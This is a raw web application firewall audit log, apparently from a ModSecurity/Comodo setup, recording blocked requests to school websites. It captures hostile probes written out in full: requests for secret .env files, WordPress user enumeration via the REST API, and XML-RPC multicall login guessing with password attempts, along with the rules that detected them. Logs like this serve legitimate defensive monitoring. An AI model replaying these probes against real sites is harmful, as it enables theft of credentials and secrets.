Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074167836396 835 (- - -) Stopwatch2: 1748074167836396 835; combined=313, p1=271, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67bc6751-Z-- --48caff7e-A-- [24/May/2025:15:09:29 +0700] aDF-ueO2UzDOKMmK0i6jfAAAAAE 103.236.140.4 52116 103.236.140.4 8181 --48caff7e-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644057 --48caff7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48caff7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074169280109 663 (- - -) Stopwatch2: 1748074169280109 663; combined=274, p1=247, p2=0, p3=0, p4=0, p5=27, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48caff7e-Z-- --538ff573-A-- [24/May/2025:15:09:31 +0700] aDF-u-O2UzDOKMmK0i6jfgAAAAw 103.236.140.4 52120 103.236.140.4 8181 --538ff573-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644060 --538ff573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --538ff573-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074171930897 611 (- - -) Stopwatch2: 1748074171930897 611; combined=256, p1=229, p2=0, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --538ff573-Z-- --0009917a-A-- [24/May/2025:15:09:33 +0700] aDF-vfmzt4abyoi_U9n_FQAAAJc 103.236.140.4 52128 103.236.140.4 8181 --0009917a-B-- GET /library/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029884 --0009917a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0009917a-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074173225516 638 (- - -) Stopwatch2: 1748074173225516 638; combined=249, p1=217, p2=0, p3=0, p4=0, p5=31, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0009917a-Z-- --31f2912b-A-- [24/May/2025:15:09:34 +0700] aDF-vuO2UzDOKMmK0i6jfwAAAAg 103.236.140.4 52132 103.236.140.4 8181 --31f2912b-B-- GET /nextjs-app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644063 --31f2912b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --31f2912b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074174568893 721 (- - -) Stopwatch2: 1748074174568893 721; combined=277, p1=236, p2=0, p3=0, p4=0, p5=41, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31f2912b-Z-- --64639928-A-- [24/May/2025:15:09:36 +0700] aDF-wOO2UzDOKMmK0i6jgAAAABE 103.236.140.4 52136 103.236.140.4 8181 --64639928-B-- GET /node-api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029887 --64639928-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --64639928-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074176062355 795 (- - -) Stopwatch2: 1748074176062355 795; combined=294, p1=257, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64639928-Z-- --2cf50848-A-- [24/May/2025:15:09:37 +0700] aDF-weO2UzDOKMmK0i6jgQAAAAs 103.236.140.4 52140 103.236.140.4 8181 --2cf50848-B-- GET /vendor/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644066 --2cf50848-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2cf50848-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074177475801 816 (- - -) Stopwatch2: 1748074177475801 816; combined=312, p1=270, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2cf50848-Z-- --ad87c74d-A-- [24/May/2025:15:09:42 +0700] aDF-xuO2UzDOKMmK0i6jgwAAAA0 103.236.140.4 52144 103.236.140.4 8181 --ad87c74d-B-- GET /backend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644069 --ad87c74d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad87c74d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074182150919 720 (- - -) Stopwatch2: 1748074182150919 720; combined=316, p1=268, p2=0, p3=0, p4=0, p5=48, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad87c74d-Z-- --c79b6966-A-- [24/May/2025:15:09:45 +0700] aDF-yeO2UzDOKMmK0i6jhQAAAAU 103.236.140.4 52150 103.236.140.4 8181 --c79b6966-B-- GET /myproject/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644072 --c79b6966-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c79b6966-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074185068286 573 (- - -) Stopwatch2: 1748074185068286 573; combined=268, p1=233, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c79b6966-Z-- --5645e442-A-- [24/May/2025:15:09:46 +0700] aDF-yuO2UzDOKMmK0i6jhgAAABc 103.236.140.4 52156 103.236.140.4 8181 --5645e442-B-- GET /.envs/.production/.django HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029896 --5645e442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5645e442-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074186372370 711 (- - -) Stopwatch2: 1748074186372370 711; combined=272, p1=237, p2=0, p3=0, p4=0, p5=34, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5645e442-Z-- --2a0db700-A-- [24/May/2025:15:09:47 +0700] aDF-y-O2UzDOKMmK0i6jhwAAABU 103.236.140.4 52160 103.236.140.4 8181 --2a0db700-B-- GET /react-app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 168644075 --2a0db700-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2a0db700-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074187734913 451 (- - -) Stopwatch2: 1748074187734913 451; combined=152, p1=135, p2=0, p3=0, p4=0, p5=16, sr=41, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a0db700-Z-- --ef710c47-A-- [24/May/2025:15:09:49 +0700] aDF-zeO2UzDOKMmK0i6jiAAAABA 103.236.140.4 52164 103.236.140.4 8181 --ef710c47-B-- GET /react-app/.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.116 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.116 Accept-Encoding: gzip X-Varnish: 163029899 --ef710c47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ef710c47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748074189140764 723 (- - -) Stopwatch2: 1748074189140764 723; combined=265, p1=225, p2=0, p3=0, p4=0, p5=39, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef710c47-Z-- --d131de32-A-- [24/May/2025:15:14:12 +0700] aDF_1Pmzt4abyoi_U9n_IQAAAJY 103.236.140.4 52264 103.236.140.4 8181 --d131de32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.156.104.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.156.104.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d131de32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d131de32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748074452489027 3130 (- - -) Stopwatch2: 1748074452489027 3130; combined=1365, p1=460, p2=874, p3=0, p4=0, p5=30, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d131de32-Z-- --86e04969-A-- [24/May/2025:15:32:56 +0700] aDGEOOO2UzDOKMmK0i6j2AAAAAA 103.236.140.4 52544 103.236.140.4 8181 --86e04969-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.57.189.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.57.189.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --86e04969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86e04969-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748075576947997 3161 (- - -) Stopwatch2: 1748075576947997 3161; combined=1435, p1=534, p2=870, p3=0, p4=0, p5=31, sr=165, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86e04969-Z-- --df0c2672-A-- [24/May/2025:15:38:57 +0700] aDGFoeO2UzDOKMmK0i6j6gAAAA8 103.236.140.4 52670 103.236.140.4 8181 --df0c2672-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 148.113.181.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 148.113.181.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --df0c2672-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df0c2672-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748075937145722 2914 (- - -) Stopwatch2: 1748075937145722 2914; combined=1313, p1=481, p2=801, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df0c2672-Z-- --0b43f654-A-- [24/May/2025:16:09:16 +0700] aDGMvOunkxaVeh4NwhbStAAAAEM 103.236.140.4 53022 103.236.140.4 8181 --0b43f654-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 176.88.175.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.88.175.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0b43f654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b43f654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748077756699346 2706 (- - -) Stopwatch2: 1748077756699346 2706; combined=1215, p1=421, p2=763, p3=0, p4=0, p5=30, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b43f654-Z-- --eb484154-A-- [24/May/2025:16:37:34 +0700] aDGTXjvI5DIWBJ2mFG5L2gAAANY 103.236.140.4 53450 103.236.140.4 8181 --eb484154-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 4.188.78.57 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 4.188.78.57 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --eb484154-C-- system.multicallmethodNamewp.getUsersBlogsparamsdcrepairantix --eb484154-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb484154-E-- --eb484154-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 4.188.78.57 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748079454194122 4636 (- - -) Stopwatch2: 1748079454194122 4636; combined=3591, p1=403, p2=3020, p3=0, p4=0, p5=100, sr=78, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb484154-Z-- --269d367d-A-- [24/May/2025:16:39:55 +0700] aDGT6-unkxaVeh4NwhbS2QAAAEg 103.236.140.4 53494 103.236.140.4 8181 --269d367d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --269d367d-C-- system.multicallmethodNamewp.getUsersBlogsparamstuhipintesmoltantix --269d367d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --269d367d-E-- --269d367d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748079595740138 4728 (- - -) Stopwatch2: 1748079595740138 4728; combined=3691, p1=383, p2=3132, p3=0, p4=0, p5=104, sr=71, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --269d367d-Z-- --534bd94f-A-- [24/May/2025:16:40:43 +0700] aDGUGzvI5DIWBJ2mFG5L6gAAAMo 103.236.140.4 53514 103.236.140.4 8181 --534bd94f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --534bd94f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --534bd94f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748079643965839 914 (- - -) Stopwatch2: 1748079643965839 914; combined=349, p1=301, p2=0, p3=0, p4=0, p5=48, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
